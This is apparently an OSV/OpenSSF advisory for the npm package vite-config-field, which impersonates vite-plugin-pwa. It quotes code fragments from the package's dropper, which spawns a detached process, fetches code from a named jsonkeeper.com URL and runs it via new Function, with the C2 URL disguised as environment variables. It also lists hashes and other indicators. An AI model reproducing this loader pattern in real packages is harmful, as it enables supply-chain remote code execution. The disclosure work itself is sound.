MAL-2026-5936

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-config-field/MAL-2026-5936.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5936

Published

2026-06-16T22:20:36Z

Modified

2026-06-16T23:16:57.151678802Z

Summary

Malicious code in vite-config-field (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (d52d1d84d7572baf6a74539864b64d5b5c803f828fc82a1dae4de2dfebdb986f)

Package impersonates the legitimate vite-plugin-pwa (cloned description 'Zero-config PWA for Vite', repository vite-pwa/vite-config-field, funding link to github.com/sponsors/antfu, and exports matching the upstream API including VitePWA, cachePreset, and configField). When a consumer adds the plugin to their Vite config and the exported configField() runs, it invokes getUseropt() which calls child_process.spawn('node', ['./client/dev/reactopt.js',...], { detached: true, stdio: 'ignore' }) and unrefs the child. The spawned dist/client/dev/reactopt.js performs axios.get('https://www.jsonkeeper.com/b/HIECD', { headers: { 'x-secret-key': '_' } }), takes response.data.Cookie, and executes it with new Function('require', s)(require) — arbitrary remote code execution with full require capability, retrying 5 times. The C2 URL is disguised inside a fake process.env object (DEV_API_KEY/DEV_SECRET_KEY/DEV_SECRET_VALUE) to masquerade as environment-variable reads, and console output is silenced around the eval. The detached, stdio-ignored child means the dropper survives independent of the parent build/dev process.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006846",
            "import_time": "2026-06-16T23:03:43.587411959Z",
            "source": "amazon-inspector",
            "versions": [
                "1.1.2"
            ],
            "modified_time": "2026-06-16T22:20:36Z",
            "sha256": "d52d1d84d7572baf6a74539864b64d5b5c803f828fc82a1dae4de2dfebdb986f"
        }
    ]
}

References

https://www.npmjs.com/package/vite-config-field/v/1.1.2

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / vite-config-field

Package

Name: vite-config-field; View open source insights on deps.dev
Purl: pkg:npm/vite-config-field

Affected ranges

Affected versions

1.*

1.1.2

Database specific

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-config-field/MAL-2026-5936.json"

indicators

{
    "package_integrity": [
        {
            "filename": "vite-config-field-1.1.2.tgz",
            "hashes": {
                "sha1": "19924b02035488737fac3c7c766b38558cdc56b5",
                "sha512_sri": "sha512-SgjwfCuhi5SeYwryLDtzZtoWImWGCM/L6PMMwU6ScMRXsMIbmi2s59pRR0HRgbD7Y1300jIy2FPLkfX55KXPcQ=="
            }
        }
    ],
    "evidence_files": [
        {
            "path": "dist/client/dev/reactopt.js",
            "sha256": "dc0c817d1dae202d8736ee2fa5f5cd8eeb6a84c2226809efb4e42e0913e76704",
            "tlsh": "0721124f757ca0a8017013f6672be426f965643f300190d5739c87a21f3655da242fde"
        },
        {
            "path": "package.json",
            "sha256": "bed54d296fefee1487ca52c82c49024a22cfc46da713d95b549c7469e0873b22",
            "tlsh": "2da1ed26c8a14ce319c035a9ac6d4287e035954bcd96fc0473cc462e0f8e6af61be77e"
        }
    ]
}